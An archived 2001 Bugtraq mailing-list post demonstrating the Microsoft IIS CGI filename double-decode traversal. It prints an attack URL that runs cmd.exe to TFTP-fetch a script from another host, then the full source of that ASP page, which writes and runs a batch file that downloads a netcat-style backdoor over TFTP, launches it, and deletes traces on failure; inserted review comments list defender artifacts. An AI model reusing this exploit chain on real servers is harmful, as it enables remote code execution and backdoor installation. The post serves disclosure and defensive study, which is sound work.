Microsoft IIS CGI Filename Decode Error V - How to
daemon@ATHENA.MIT.EDU (Adriano Dias)
Thu May 17 11:42:08 2001
Message-ID: <8BDA1EB00303F74E87168276E2E687830FCE02@hermes.proteus.net>
From: Adriano Dias <adias@proteus.com.br>
To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Date: Thu, 17 May 2001 09:01:59 -0300
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
That's what I did:
http://192.168.0.1/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.ex
e?/c+tftp.exe+-i+192.168.0.2+GET+f.asp+c:\inetpub\scripts\f.asp
Then I ran http://192.168.0.1/f.asp
Following is a copy of f.asp:
----------cut here-------------------------
<%
' Review note: this is the ASP/VBScript page placed on the server by the request quoted
' above. It does three things: selects a drive, writes a batch file (dl.bat) next to itself,
' and executes that batch file through WScript.Shell.
' Artifacts a defender can look for, all taken from the lines below: dl.bat under
' \Inetpub\scripts, outbound TFTP from the web server, nc0.exe / ncx99.exe in the scripts
' directory, and an HTTP response body of the form "|<drive>*<type>*<free>*<total>*<serial>".
Set fs = CreateObject("Scripting.FileSystemObject")
Set drv = fs.Drives
' Pick the ready, non-A: drive with the most free space; its letter (dmax) is later passed
' as the single argument to dl.bat. dmab/dmaa/dmad only feed the final Response.Write.
dmax = ""
dmac = 0
For each d in drv
If d.Driveletter <> "A" And d.IsReady Then
If d.AvailableSpace > dmac then
dmac = d.AvailableSpace
dmab = d.DriveType
dmaa = d.TotalSize
dmad = d.SerialNumber
dmax = d.DriveLetter
End If
End If
Next
' Server.MapPath resolves relative to the executing page, so dl.bat lands in the same
' web-accessible directory as f.asp (\Inetpub\scripts per the cd below).
filename = server.mappath("dl.bat")
Set tf = fs.CreateTextFile(filename, True)
tf.WriteLine("@echo off")
tf.WriteLine("cd \Inetpub\scripts")
tf.WriteLine("startDL:")
' The next WriteLine is split across two lines in the archived post (mail wrapping of the
' original message); the string literal is shown here exactly as archived.
tf.WriteLine("tftp.exe -i 192.168.1.33 get ncx99.exe
c:\inetpub\scripts\nc0.exe")
' The batch file loops on the TFTP fetch until its existence check passes, then starts the
' downloaded binary, clears read-only attributes and deletes the TFTP temp files.
tf.WriteLine("if not exist ncx99.exe goto startDL")
tf.WriteLine("start /w nc0.exe")
tf.WriteLine("attrib TFTP* -r")
tf.WriteLine("attrib nc0.exe -r")
tf.WriteLine("del TFTP*")
tf.WriteLine("exit")
tf.Close
dim command
dim wshShell
' Command line is "<path to dl.bat> <drive letter>"; dmax may be "" if no drive qualified.
command = server.mappath("dl.bat") & " " & dmax
' Errors from CreateObject/Run are swallowed and checked via Err below.
On Error Resume Next
Set wshShell = CreateObject("WScript.Shell")
wshShell.Run (command)
If Err Then
' On failure the batch file is removed again, so a failed attempt leaves fewer traces
' on disk; the IIS request log and any TFTP traffic would still record it.
Set objFSO = Server.CreateObject("scripting.filesystemobject")
pathname = server.mappath("dl.bat")
objFSO.DeleteFile pathname
Set objFSO = Nothing
Else
' On success the chosen drive's details are echoed to the HTTP client, "|" and "*"
' delimited. This statement is also wrapped across two lines in the archived post.
Response.Write "|" & dmax & "*" & dmab & "*" & dmac & "*" & dmaa & "*" &
dmad
End If
%>
-----------cut here----------------------